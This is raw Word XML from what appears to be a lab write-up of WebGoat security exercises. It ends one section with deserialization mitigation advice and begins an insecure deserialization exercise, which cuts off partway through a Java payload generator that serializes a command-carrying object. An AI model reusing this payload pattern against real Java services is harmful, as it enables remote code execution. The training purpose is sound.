          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Analysis and Conclusions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F82BB0F" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="354F0FEF" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Implications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3523035D" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Insecure deserialization can lead to remote code execution, posing a severe risk to the confidentiality and integrity of the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B44E1D3" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Insights:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9829BA" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Gain insights into the importance of secure deserialization practices and the impact of known vulnerabilities in widely-used libraries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3485A8C0" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Recommendations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A7A1F9" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67FD873A" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Mitigating Identified Vulnerabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043997A3" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Apply patches or updates to address the CVE-2013-7285 vulnerability in XStream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307AFA58" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Implement proper input validation and filtering to prevent insecure deserialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E2C94C" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Improving Security Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5165D1" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Educate developers on secure coding practices, emphasizing the risks associated with deserialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BBCA7B" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Reflection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F53BC6F" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A70A971" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Lessons Learned:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2139F3" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Understanding the significance of secure deserialization and the need for timely patching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B920AE" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Future Approaches:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3127815D" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Prioritize regular security audits and testing to identify and address deserialization vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539A9192" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Cybersecurity Principles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCF5E23" w14:textId="77777777" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Illustrates the critical importance of input validation and secure coding in preventing exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769D9F96" w14:textId="0D5B453A" w:rsidR="009C1AC4" w:rsidRPr="009C1AC4" w:rsidRDefault="009C1AC4" w:rsidP="009C1AC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C1AC4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>References:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4274D769" w14:textId="77777777" w:rsidR="00223B1A" w:rsidRDefault="00223B1A" w:rsidP="00403A14">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BF107CF" w14:textId="77777777" w:rsidR="00223B1A" w:rsidRDefault="00223B1A" w:rsidP="00403A14">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="038B4C78" w14:textId="77777777" w:rsidR="00223B1A" w:rsidRDefault="00223B1A" w:rsidP="00403A14">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C24A33D" w14:textId="77777777" w:rsidR="00223B1A" w:rsidRDefault="00223B1A" w:rsidP="00403A14">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AB051F4" w14:textId="77777777" w:rsidR="00223B1A" w:rsidRDefault="00223B1A" w:rsidP="00403A14">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="550A7886" w14:textId="77777777" w:rsidR="002719E9" w:rsidRDefault="002719E9" w:rsidP="00403A14">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FF487E5" w14:textId="3E336730" w:rsidR="00223B1A" w:rsidRDefault="00197E53" w:rsidP="00403A14">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>A8- Insecure Deserialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587C5402" w14:textId="2637083D" w:rsidR="00197E53" w:rsidRDefault="000E34E7" w:rsidP="00403A14">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Let’s </w:t>
      </w:r>
      <w:r w:rsidR="000B763B">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>try.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798BBA62" w14:textId="77777777" w:rsidR="00A510D6" w:rsidRDefault="00A510D6" w:rsidP="00403A14">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="662F4630" w14:textId="77777777" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Exercise Title and Objective: "Insecure Deserialization Attack on WebGoat"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA47C6D" w14:textId="77777777" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Objective: Assess the vulnerability of WebGoat to insecure deserialization attacks and demonstrate the potential impact on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47462508" w14:textId="77777777" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69079007" w14:textId="77777777" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Methodology: Utilized browser Development Tools and Network tab to intercept and manipulate HTTP requests. Exploited insecure deserialization in WebGoat to manipulate serialized data and execute arbitrary code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622D3A80" w14:textId="77777777" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C2A3828" w14:textId="77777777" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Steps Taken:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB959CD" w14:textId="77777777" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33B716AB" w14:textId="77777777" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00F3546C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="360" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Identified a serialized object in a WebGoat request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11ED6814" w14:textId="77777777" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00F3546C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="360" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Captured the serialized data and modified it to inject malicious code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3712AA34" w14:textId="71972A6C" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00F3546C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="360" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Utilized a crafted payload generation method in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>IntelliJ:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5B04DE4E" w14:textId="77777777" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00F3546C">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">public void </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>createPayload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D14394" w14:textId="77777777" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00F3546C">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>VulnerableTaskHolder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> o = new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>VulnerableTaskHolder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>namenotimportant</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>", "sleep 5");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1A7E86" w14:textId="77777777" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00F3546C">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>ByteArrayOutputStream</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>baos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> = new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>ByteArrayOutputStream</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5274BAE3" w14:textId="77777777" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00F3546C">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>ObjectOutputStream</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>oos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> = new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>ObjectOutputStream</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>baos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="633278FE" w14:textId="77777777" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00F3546C">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>oos.writeObject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>(o);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2258A302" w14:textId="77777777" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00F3546C">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>oos.close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D724B6F" w14:textId="77777777" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00F3546C">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">    System.out.println(Base64.getEncoder(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
